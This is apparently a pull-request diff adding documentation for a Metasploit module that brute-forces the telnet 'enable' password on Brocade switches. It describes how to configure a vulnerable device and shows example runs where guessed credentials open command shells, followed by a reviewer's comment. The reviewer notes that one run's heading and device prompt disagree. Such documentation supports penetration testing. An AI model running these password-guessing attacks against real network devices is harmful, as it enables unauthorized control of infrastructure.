|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | + This module is a login bruteforcer against Brocade network device's `enable` feature. |
| 4 | + |
| 5 | +To configure the device in a vulnerable fashion, follow these steps: |
| 6 | + 1. Set authentication mode via: `aaa authentication enable default local` |
| 7 | + |
| 8 | +This module works against `enable` so we want to ensure telnet itself has no auth |
| 9 | + **The following should not be set**: `enable telnet authentication` |
| 10 | + |
| 11 | +This module has been verified against: |
| 12 | + 1. ICX6450-24 SWver 07.4.00bT311 |
| 13 | + 2. FastIron WS 624 SWver 07.2.02fT7e1 |
| 14 | + |
| 15 | +An emulator is available [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/brocade_emulator.py) |
| 16 | + |
| 17 | +## Verification Steps |
| 18 | + |
| 19 | + 1. Install the emulator or device |
| 20 | + 2. Start msfconsole |
| 21 | + 3. Do: `use auxiliary/scanner/telnet/brocade_enable_login` |
| 22 | + 4. Create/set a password file: `set pass_file /<passwords.lst>` |
| 23 | + 5. If desired: `set user_as_pass true` |
| 24 | + 6. Do: `set rhosts <ip>` |
| 25 | + 7. Do: `run` |
| 26 | + 8. You should get a shell. |
| 27 | + |
| 28 | +## Scenarios |
| 29 | + |
| 30 | + Example run against ICX6450-24 SWver 07.4.00bT311 |
| 31 | + |
| 32 | +``` |
| 33 | +msf > use auxiliary/scanner/telnet/brocade_enable_login |
| 34 | +msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst |
| 35 | +pass_file => /passwords.lst |
| 36 | +msf auxiliary(brocade_enable_login) > set user_as_pass true |
| 37 | +user_as_pass => true |
| 38 | +msf auxiliary(brocade_enable_login) > set rhosts 192.168.50.1 |
| 39 | +rhosts => 192.168.50.1 |
| 40 | +msf auxiliary(brocade_enable_login) > run |
| 41 | +
|
| 42 | +[*] Attempting username gathering from config on 192.168.50.1 |
| 43 | + |
| 44 | + |
| 45 | + |
| 46 | +[*] Attempting username gathering from running-config on 192.168.50.1 |
| 47 | + |
| 48 | + |
| 49 | + |
| 50 | +[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: admin:admin |
| 51 | +[*] Attempting to start session 192.168.50.1:23 with admin:admin |
| 52 | +[*] Command shell session 1 opened (192.168.50.2:57524 -> 192.168.50.1:23) at 2015-03-06 20:19:41 -0500 |
| 53 | +[-] 192.168.50.1:23 - LOGIN FAILED: read:admin (Incorrect: ) |
| 54 | +[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: read:read |
| 55 | +[*] Attempting to start session 192.168.50.1:23 with read:read |
| 56 | +[*] Command shell session 2 opened (192.168.50.2:49223 -> 192.168.50.1:23) at 2015-03-06 20:20:32 -0500 |
| 57 | +[-] 192.168.50.1:23 - LOGIN FAILED: port:read (Incorrect: ) |
| 58 | +[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: port:port |
| 59 | +[*] Attempting to start session 192.168.50.1:23 with port:port |
| 60 | +[*] Command shell session 3 opened (192.168.50.2:34683 -> 192.168.50.1:23) at 2015-03-06 20:21:23 -0500 |
| 61 | +[-] 192.168.50.1:23 - LOGIN FAILED: admin:port (Unable to Connect: ) |
| 62 | +[-] 192.168.50.1:23 - LOGIN FAILED: admin:admin (Unable to Connect: ) |
| 63 | +[-] 192.168.50.1:23 - LOGIN FAILED: admin:12345678 (Unable to Connect: ) |
| 64 | +[-] 192.168.50.1:23 - LOGIN FAILED: read:port (Unable to Connect: ) |
| 65 | +[-] 192.168.50.1:23 - LOGIN FAILED: read:read (Unable to Connect: ) |
| 66 | +[-] 192.168.50.1:23 - LOGIN FAILED: read:12345678 (Unable to Connect: ) |
| 67 | +[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: ) |
| 68 | +[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: ) |
| 69 | +[-] 192.168.50.1:23 - LOGIN FAILED: port:12345678 (Unable to Connect: ) |
| 70 | +[*] Scanned 1 of 1 hosts (100% complete) |
| 71 | +[*] Auxiliary module execution completed |
| 72 | +msf auxiliary(brocade_enable_login) > sessions -l |
| 73 | +
|
| 74 | +Active sessions |
| 75 | +=============== |
| 76 | +
|
| 77 | + Id Type Information Connection |
| 78 | + -- ---- ----------- ---------- |
| 79 | + 1 shell TELNET admin:admin (192.168.50.1:23) 192.168.50.2:57524 -> 192.168.50.1:23 (192.168.50.1) |
| 80 | + 2 shell TELNET read:read (192.168.50.1:23) 192.168.50.2:49223 -> 192.168.50.1:23 (192.168.50.1) |
| 81 | + 3 shell TELNET port:port (192.168.50.1:23) 192.168.50.2:34683 -> 192.168.50.1:23 (192.168.50.1) |
| 82 | +
|
| 83 | +msf auxiliary(brocade_enable_login) > session -i 1 |
| 84 | +[-] Unknown command: session. |
| 85 | +msf auxiliary(brocade_enable_login) > sessions -i 1 |
| 86 | +[*] Starting interaction with 1... |
| 87 | +
|
| 88 | +show sessions ? |
| 89 | +Unrecognized command |
| 90 | +BR-telnet@FWS624 Router#show ? |
| 91 | + 802-1w Rapid Spanning tree IEEE 802.1w D10 status |
| 92 | + aaa Show TACACS+ and RADIUS server statistics |
| 93 | + access-list show IPv4 access-list information |
| 94 | + acl-on-arp Show ARP ACL filtering |
| 95 | + arp Arp table |
| 96 | + auth-mac-addresses MAC Authentication status |
| 97 | + batch Batch commands |
| 98 | + boot-preference System boot preference |
| 99 | + buffer-profile Displays active profile |
| 100 | + cable-diagnostics Show Cable Diagnostics |
| 101 | + chassis Power supply/fan/temperature |
| 102 | + clock System time and date |
| 103 | + configuration Configuration data in startup config file |
| 104 | + cpu-utilization CPU utilization rate |
| 105 | + debug Debug information |
| 106 | + default System default settings |
| 107 | + dot1x Dot1x information |
| 108 | + errdisable Errdisable status |
| 109 | + fdp CDP/FDP information |
| 110 | + flash Flash memory contents |
| 111 | + gvrp GVRP information |
| 112 | + inline inline power information |
| 113 | + interfaces Port status |
| 114 | +--More--, next page: Space, next line: Return key, quit: Control-c |
| 115 | + ip IP address setting |
| 116 | + ipv6 IP setting |
| 117 | + license Show license information |
| 118 | + link-aggregate 802.3ad Link Aggregation Information |
| 119 | + link-error-disable Link Debouncing Control |
| 120 | + link-keepalive Link Layer Keepalive |
| 121 | + lldp Link-Layer Discovery Protocol information |
| 122 | + local-userdb Local User Database information |
| 123 | + logging System log |
| 124 | + loop-detection loop detection status & disabled ports |
| 125 | + mac-address MAC address table |
| 126 | + media 1Gig/10G port media type |
| 127 | + memory System memory usage |
| 128 | + metro-ring Metro ring protocol information |
| 129 | + mirror Mirror ports |
| 130 | + module Module type and status |
| 131 | + monitor Monitor ports |
| 132 | + mstp show MSTP (IEEE 802.1s) information |
| 133 | + optic Optic Temperature and Power |
| 134 | + port Show port security |
| 135 | + priority-mapping 802.1Q tagged priority setting |
| 136 | + processes Active process statistics |
| 137 | + protected-link-group Show Protected Link Group Details |
| 138 | +--More--, next page: Space, next line: Return key, quit: Control-c |
| 139 | + ptrace Global ptrace information |
| 140 | + qd-buffer-profile User configured buffer/descriptor profiles |
| 141 | + qos-profiles QOS configuration |
| 142 | + qos-tos IPv4 ToS based QoS |
| 143 | + radius show radius server debug info |
| 144 | + rate-limit Rate-limiting table and actions |
| 145 | + redundancy Display management redundancy details |
| 146 | + relative-utilization Relative utilization list |
| 147 | + reload Scheduled system reset |
| 148 | + reserved-vlan-map Reserved VLAN map status |
| 149 | + rmon Rmon status |
| 150 | + running-config Current running-config |
| 151 | + scheduler-profile User configured scheduling profiles |
| 152 | + sflow sFlow information |
| 153 | + snmp SNMP statistics |
| 154 | + sntp Show SNTP |
| 155 | + span Spanning tree status |
| 156 | + statistics Packet statistics |
| 157 | + stp-bpdu-guard BPDU Guard status |
| 158 | + stp-group Spanning Tree Group Membership |
| 159 | + stp-protect-ports Show stp-protect enabled ports and their BPDU drop |
| 160 | + counters |
| 161 | + table-mac-vlan MAC Based VLAN status |
| 162 | +--More--, next page: Space, next line: Return key, quit: Control-c |
| 163 | + tech-support System snap shot for tech support |
| 164 | + telnet Telnet connection |
| 165 | + topology-group Topology Group Membership |
| 166 | + traffic-policy Show traffic policy definition |
| 167 | + trunk Show trunk status |
| 168 | + users User accounts |
| 169 | + v6-l4-acl-sessions Show IPv6 software sessions |
| 170 | + version System status |
| 171 | + vlan VLAN status |
| 172 | + vlan-group VLAN Group Membership |
| 173 | + voice-vlan Show voice vlan |
| 174 | + vsrp Show VSRP commands |
| 175 | + web-connection Current web connections |
| 176 | + webauth web authentication information |
| 177 | + who User login |
| 178 | + | Output modifiers |
| 179 | + <cr> |
| 180 | +BR-telnet@FWS624 Router# |
| 181 | +``` |
| 182 | + |
| 183 | + Example run against emulator mentioned above: |
| 184 | + |
| 185 | +``` |
| 186 | +msf > use auxiliary/scanner/telnet/brocade_enable_login |
| 187 | +msf auxiliary(brocade_enable_login) > set rhosts 127.0.0.1 |
| 188 | +rhosts => 127.0.0.1 |
| 189 | +msf auxiliary(brocade_enable_login) > set user_as_pass true |
| 190 | +user_as_pass => true |
| 191 | +msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst |
| 192 | +pass_file => /passwords.lst |
| 193 | +msf auxiliary(brocade_enable_login) > run |
| 194 | +
|
| 195 | +[*] Attempting username gathering from config on 127.0.0.1 |
| 196 | + |
| 197 | + |
| 198 | + |
| 199 | +[*] Attempting username gathering from running-config on 127.0.0.1 |
| 200 | + |
| 201 | +[-] 127.0.0.1:23 - LOGIN FAILED: username:username (Incorrect: ) |
| 202 | +[-] 127.0.0.1:23 - LOGIN FAILED: username:12345678 (Incorrect: ) |
| 203 | +[-] 127.0.0.1:23 - LOGIN FAILED: username:123456 (Incorrect: ) |
| 204 | +[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: username:password |
| 205 | +[*] Attempting to start session 127.0.0.1:23 with username:password |
| 206 | +[*] Command shell session 1 opened (127.0.0.1:60089 -> 127.0.0.1:23) at 2015-03-06 20:05:57 -0500 |
| 207 | +[-] 127.0.0.1:23 - LOGIN FAILED: ttrogdon:password (Incorrect: ) |
| 208 | +[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: ttrogdon:ttrogdon |
| 209 | +[*] Attempting to start session 127.0.0.1:23 with ttrogdon:ttrogdon |
| 210 | +[*] Command shell session 2 opened (127.0.0.1:33204 -> 127.0.0.1:23) at 2015-03-06 20:06:47 -0500 |
| 211 | +[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ttrogdon (Incorrect: ) |
| 212 | +[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:dmudd (Incorrect: ) |
| 213 | +[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:12345678 (Incorrect: ) |
| 214 | +[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:123456 (Incorrect: ) |
| 215 | +[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:password (Incorrect: ) |
| 216 | +[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:passwords (Incorrect: ) |
| 217 | +[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ports (Incorrect: ) |
| 218 | +[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:admin (Incorrect: ) |
| 219 | +[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:read (Incorrect: ) |
| 220 | +[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ttrogdon (Incorrect: ) |
| 221 | +[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:TopDogUser (Incorrect: ) |
| 222 | +[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:12345678 (Incorrect: ) |
| 223 | +[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:123456 (Incorrect: ) |
| 224 | +[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:password (Incorrect: ) |
| 225 | +[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:passwords (Incorrect: ) |
| 226 | +[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ports (Incorrect: ) |
| 227 | +[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:admin (Incorrect: ) |
| 228 | +[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:read (Incorrect: ) |
| 229 | +[*] Scanned 1 of 1 hosts (100% complete) |
| 230 | +[*] Auxiliary module execution completed |
| 231 | +msf auxiliary(brocade_enable_login) > sessions -l |
| 232 | +
|
| 233 | +Active sessions |
| 234 | +=============== |
| 235 | +
|
| 236 | + Id Type Information Connection |
| 237 | + -- ---- ----------- ---------- |
| 238 | + 1 shell TELNET username:password (127.0.0.1:23) 127.0.0.1:60089 -> 127.0.0.1:23 (127.0.0.1) |
| 239 | + 2 shell TELNET ttrogdon:ttrogdon (127.0.0.1:23) 127.0.0.1:33204 -> 127.0.0.1:23 (127.0.0.1) |
| 240 | +
|
| 241 | +msf auxiliary(brocade_enable_login) > |
| 242 | +``` |
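Review bot: The first scenario is headed "Example run against ICX6450-24 SWver 07.4.00bT311" (diff line 30), but the interactive prompt later in the same transcript reads `BR-telnet@FWS624 Router#` (diff lines 90 and 180), which matches the FastIron WS 624 listed as the second verified device; please correct the heading or swap in a transcript from the ICX6450-24 so the two agree. In that transcript, the mistyped `session -i 1` with its "Unknown command" error, the stray `show sessions ?`, and the full paged `show ?` listing (diff lines 83-180) can be trimmed to the `sessions -i 1` call and the device prompt, which is enough to show that the session works. The run of "Unable to Connect" failures at diff lines 61-69 comes right after the three sessions open and is left unexplained, so a sentence on why those attempts fail would help readers interpret their own output. `pass_file` and `user_as_pass` are used in Verification Steps without an Options section describing what they do, and since the first section documents the setting that exposes `enable` to guessing (`aaa authentication enable default local` with no `enable telnet authentication`), a short note on the configuration operators should use instead would make the page useful for remediation as well as testing.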